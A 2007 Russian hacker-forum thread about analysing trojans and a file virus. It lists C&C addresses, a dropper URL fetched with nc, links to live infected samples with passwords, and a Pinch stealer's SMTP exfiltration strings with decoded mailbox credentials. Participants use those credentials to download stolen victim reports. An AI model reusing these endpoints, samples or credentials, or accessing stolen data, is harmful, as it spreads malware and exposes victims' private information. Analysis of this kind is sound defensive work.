В этом топике происходит исследование малвари: вирусни, троянов, как их вычистить и тд.

| Сообщение посчитали полезным:

[HEX] пишет:
Столько сольется всего что потом на всю жизнь хватить анализировать.... хихи

велктом ту бот нет) фор спам))

-----
[nice coder and reverser]

| Сообщение посчитали полезным:

Hellspawn
Изыди Чтоб я такое говно запустил. Нетуж спасибо.

Кстати на данный момент оттуда ( 195.5.117.230:2703 ) льется спамилка, но это не значит что завтра не сольется оттуда ддос или кейлогер.

-----
Computer Security Laboratory

| Сообщение посчитали полезным:

kcp.sys
oleauth3.dll
mstscex.dll

то что попытался создать... с дровами я на основной системе возится не хочу а виртуалки пока нет

| Сообщение посчитали полезным:

Halt
По логу анализа видно что создает, читает, запускает и куда обращается.
Ну а чтобы получить файлы который он создал можно этим сервисом воспользоваться hxxp://www.cwsandbox.org/?page=submit
В CAB версии отчета будет присутствовать дровина. Хотя в дровине ничего хорошего и нет.

-----
Computer Security Laboratory

| Сообщение посчитали полезным:

ааа.. сорри я отчет до конца не дочитал

| Сообщение посчитали полезным:

Трой какой-то ... инжектится в svchost.exe и просит соединения с вот этим адресом: 77.91.228.180. Что конкретнее делает - не разобрался. Там какой-то крипт кажется .... если кто осилит - расскажите что делает поподробнее и откудава это узнали
link: dump.ru/files/n/n43730414/
pass: trojan

-----
все багрепорты - в личные сообщения

| Сообщение посчитали полезным:

HandMill, качает троя с http://thenetworkcom.com/dw.php?code=00-0C-29-05-FB-5B&hash=D013EF6DC7 2704A6AED57B7A3B051176 http://thenetworkcom.com/dw.php?code=00-0C-29-05-FB-5B&hash=D013EF6DC72704A6AED57B7A3B051176 только видимо сайт в дауне этот... далее лезет на /77.91.228.182... какойто гавнолоадер...

-----
Shalom ebanats!

| Сообщение посчитали полезным:

SLV
Еще как работает!

nc thenetworkcom.com 80
GET /dw.php HTTP/1.0
Host: thenetworkcom.com

HTTP/1.1 302 Found
Date: Sun, 25 Nov 2007 15:21:10 GMT
Server: Apache
X-Powered-By: PHP/4.4.7
Location: ./soft/install_cr.exe
Connection: close
Content-Type: text/html

В итоге получаем файлик install_cr.exe размером 334955 байт.

analysis.seclab.tuwien.ac.at/result.php?taskid=610ba00b1fe540a4815bac18ae3956a6
www.cwsandbox.org/?page=details&id=46249&password=ukvno

-----
Computer Security Laboratory

| Сообщение посчитали полезным:

Вообщем сегодня нарвался на сайтег (мож баян, короче ПОХ)
Вот сцылька на статью:
xakepok.org/2007/09/14/reversim-vebmonejj-trojan-vmeste.html
Может, кому и пригодиццо, чтобы сразу не стать частью ботнета© %)))
из статьи:
Заключение: эта стотья написана для того чтобы показать жалкую сущность кедал на вмз, и попутно на раскрытие темы реверсенга малвар (мановар) хэк! ©
А вот это интересно, тоже из статьи:
только ненадо нам тупо слать пинчи и червяков сначало узнайте есть ли у нас свободное время на них %)
Red Bar0n[tPORt] ©
еще там статья содержимое такое:
В данной статье излагается нехитрый, но 100% работающий способ
сокрытия зараженного файла от ЛЮБЫХ антивирусов на Virustotal.Com© (гы, ща толпа неудачнеков бу читать %)))
ЗЫ: мну ее не читал, так что хз правдо это или нед… ищите на томже сайте

P. S.
Кто знает хде сейчас компилирует барончег(?!), огласите списки…©

-----
ЗЫ: истЕна где-то рядом, Welcome@Google.com

| Сообщение посчитали полезным:

кто разбирался что этот gormet.dll делает ?? и что в конечном итоге получается из строк вида E123E124 ?? чет я нихрена не понял... сдается мне что это зашифрованные имена функций....
ставит якобы видеоплагин Software\Microsoft\VideoPlugin но вот нахрена оно потом я так и не догнал... хотя нашел строки

типа HTTP GEt можно что -то скачать/запросить.. ддос атака чтоль?

| Сообщение посчитали полезным:

[оффтоп] хакерок гавносайт, сборище кедисов, и админ двуличная скотина. раз я увел мыло кедиса, а на мыле было до тучи ключей для вм кошельков. и регистрация на этот сайт. там это чмо (кедис) продавал под видом билдера вм троя простой трой который воровал ключи. я стукнул админу (ему 18 а по общению лет 10), рассказал все как есть. он не то что не удалил топ по и подделав логи сделал из меня клоуна и выложил на форум свой дебильный. просто антиреклама жаль что так и не вышло расшифровать хеш его пароля

-----
Shalom ebanats!

| Сообщение посчитали полезным:

Подскажите кто знает какой антивирус умеет лечить файлы,зараженные
Win32.Saburex ?
Dr.Web , NOD32 не лечат (могут только удалить вместе с файлом), после BitDefender 70% exe-шников
при запуске выдают access violation

| Сообщение посчитали полезным:

описание виря если нужно:
Технические детали

Файловый вирус, заражающий исполняемые файлы Windows. Является библиотекой Windows DLL, имеет размер 17 920 байт.
Инсталляция

После запуска вирус копирует свой исполняемый файл в системный каталог Windows:
%System%\ole16.dll

После чего изменяет значения следующих параметров ключей реестра на:

[HKCR\CLSID\{00021401-0000-0000-C000-000000000046}\InProcServer32]
@ = "ole16.dll"
ThreadingModel="both"

[HKLM\SOFTWARE\Classes\CLSID\{00021401-0000-0000-C000-000000000046}\In ProcServer32]
@ = "ole16.dll"
ThreadingModel="both"
Деструктивная активность

Вирус заражает файлы с расширением .exe на случайно выбранном разделе жесткого диска. Вирус не заражает файлы в папках, имена которых содержат следующие строки:
program files
documents and
_restore
music

При заражении вирус упаковывает тело заражаемого файла в архив CAB, после чего копирует свое тело поверх тела заражаемого файла, а упакованное тело последнего дописывает в конец. Точка входа в вирус и его заголовок при этом корректируется таким образом, что зараженный файл становится приложением Windows (PE-EXE файл) и является запускаемым.

При запуске зараженного файла тело вируса выделяется и корректируется в библиотеку DLL и в таком виде сохраняется во временную папку Windows с временным именем. После этого запускается процесс :
rundll32 %Temp%\<временное имя DLL-файла>,a <путь и имя запущенного файла>

После этого вирусный компонент удаляет свое тело из зараженного файла и распаковывает запакованное в CAB архив тело программы, тем самым полностью восстанавливает его в исходное состояние и запускает.

Вирус извлекает во временную папку с временным именем библиотеку DLL (размер 7168 байт). Также просматривает все окна на рабочем столе пользователя и внедряет в процессы, которым принадлежат эти окна, извлеченную DLL.

Извлеченная библиотека DLL будучи подгруженной к какому-либо процессу периодически делает скриншоты активного окна в системе, после чего шифрует их и публикует на сайте x***e.ru.
Рекомендации по удалению

1. Удалить файл %System%\ole16.dll.
2. Изменить значения параметров ключей реестра на:

[HKCR\CLSID\{00021401-0000-0000-C000-000000000046}\InProcServer32]
@="shell32.dll"
ThreadingModel="Apartment"

[HKLM\SOFTWARE\Classes\CLSID\{00021401-0000-0000-C000-000000000046}\In ProcServer32]
@="shell32.dll"
ThreadingModel="Apartment"
3. Удалить все файлы из папки %Temp%.
4. Для удаления всех копий вируса с жесткого диска следует воспользоваться Антивирусом Касперского с обновленными антивирусными базами (скачать пробную версию).

| Сообщение посчитали полезным:

Kycok Caxapa
Кидай вирус нам Мы хоть на скрины на сайте полюбуемся.

А так методу заражения четко описали:
При заражении вирус упаковывает тело заражаемого файла в архив CAB, после чего копирует свое тело поверх тела заражаемого файла, а упакованное тело последнего дописывает в конец. Точка входа в вирус и его заголовок при этом корректируется таким образом, что зараженный файл становится приложением Windows (PE-EXE файл) и является запускаемым.

По описалову я думаю не составит труда самому набросать утиль для лечения. Если размер тела статичен, то ищем файлы по сигнатуре, отрезаем тело вируса и распаковываем стандартной утилитой expand.exe

-----
Computer Security Laboratory

| Сообщение посчитали полезным:

Kycok Caxapa, ты прям honeypot ходячий...

-----
Shalom ebanats!

| Сообщение посчитали полезным:

Kycok Caxapa пишет:
описание виря если нужно:

Можно просто линк было дать
www.viruslist.com/ru/viruses/encyclopedia?virusid=145656

| Сообщение посчитали полезным:

[HEX] пишет:
Кидай вирус нам Мы хоть на скрины на сайте полюбуемся.
зараженный файл приаттачить что ли? можно в принципе,он портит в основном дистрибутивы и здоровые файлы (от 1.5 мб и выше)
[HEX] пишет:
По описалову я думаю не составит труда самому набросать утиль для лечения. Если размер тела статичен, то ищем файлы по сигнатуре, отрезаем тело вируса и распаковываем стандартной утилитой expand.exe
Там не все так просто,даже NOD32 его не лечит... размера тела м.б. меняется, часть файлов после излечения вообще не запускается. Каспера не могу установить потому что ему надо видишь все остальные антивири удалить перед установкой

| Сообщение посчитали полезным:

Ходил вчера один кампег лечить...
так там целый рассадник всякой дряни. Люди юзали долбаного осла (IE) да ещё без авера.
прихватил на пямять один экземплярчег гавнопича.
мoдифициpoвaнный Win32/PSW.LdPinch.NCB тpoян (так сказал мой нод)
гляньте куда он шлёт всё.
пароль: 1

7aab_27.11.2007_CRACKLAB.rU.tgz - 6.dat.rar

-----
AutoIt

| Сообщение посчитали полезным:

Вот файл,зараженный Win32.Saburex
rapidshare.com/files/72813909/Register.rar.html
Очень нужна утилита,которая сможет эту гадость вычистить так чтобы exe потом запускался

| Сообщение посчитали полезным:

OLEGator
Шлёт точно мылом на smtp.xaker.ru
А вот на какое конкретно и с каким пассом, это уже только к вечеру (под виртуалкой посмотрю).

-----
Computer Security Laboratory

| Сообщение посчитали полезным:

OLEGator
ASCII "smtp.xaker.ru"
ASCII "AUTH LOGIN",CR,LF
ASCII "bG9hZHpfMTNAeGFrZXIucnU=",CR,LF (base64 видемо, эквивалент "loadz_13@xaker.ru" это пасс ? Он по длинне не подходит)
ASCII "dW5wYXNz",CR,LF (или это пасс ? Или это тоже шифр, который нада расшифровать?)
ASCII "MAIL FROM: loadz_13@xaker.ru"
ASCII "RCPT TO: loadz_13@xaker.ru"
На мыле уже походу другой пасс - зайти не удалось (hxxp://www.nextmail.ru/)

-----
все багрепорты - в личные сообщения

| Сообщение посчитали полезным:

видать зосранчег старый и мыло кто-то прибил до нас)

-----
AutoIt

| Сообщение посчитали полезным:

вы глючитее ;) мыло работает правда отчетов там... мала....

| Сообщение посчитали полезным:

Halt
Видать народ не пробовал зайти IE или хотябы почтовым клиентом. nextmail с альтернативными браузерами вроде как тупит.

Ящик убить? Или может позеркалить письма к себе на мыло правда отчетов действительно с гулькин х?

-----
Computer Security Laboratory

| Сообщение посчитали полезным:

ну я фаерфоксом зашел... отчетов 100 штук..
я сам пинч не смотрел..но странный он какой то.. обычно мыло используют для пересылки дальше.. а тут сразу на этом мыле и отчеты.. ну в общем ты в курсе какие пинчи обычно.. ))
PS я когда отчеты сливал я их на серваке похерил... случайно хотя ничего хорошего там нет (

| Сообщение посчитали полезным:

А чем вы их смотрите то?

| Сообщение посчитали полезным:

0xy
Парсером от пинча. Можешь и руками если в формате отчетов разберешся.

-----
Computer Security Laboratory

| Сообщение посчитали полезным:

Halt, выкладывайте отчёты - пускай народ полюбуется. Может быть номерки знакомых там найдут.

-----
все багрепорты - в личные сообщения

| Сообщение посчитали полезным:

не надо выкладывать отчеты. Нафига это нужно? Кому нужно - сам возмет и реверснет трояна, а помогать ламосам угонять чужие мыла и аськи как-то не есть true.

| Сообщение посчитали полезным:

Ara
Уже выкладывать нечего. Пасс сменен или ящик прибили.

-----
Computer Security Laboratory

| Сообщение посчитали полезным: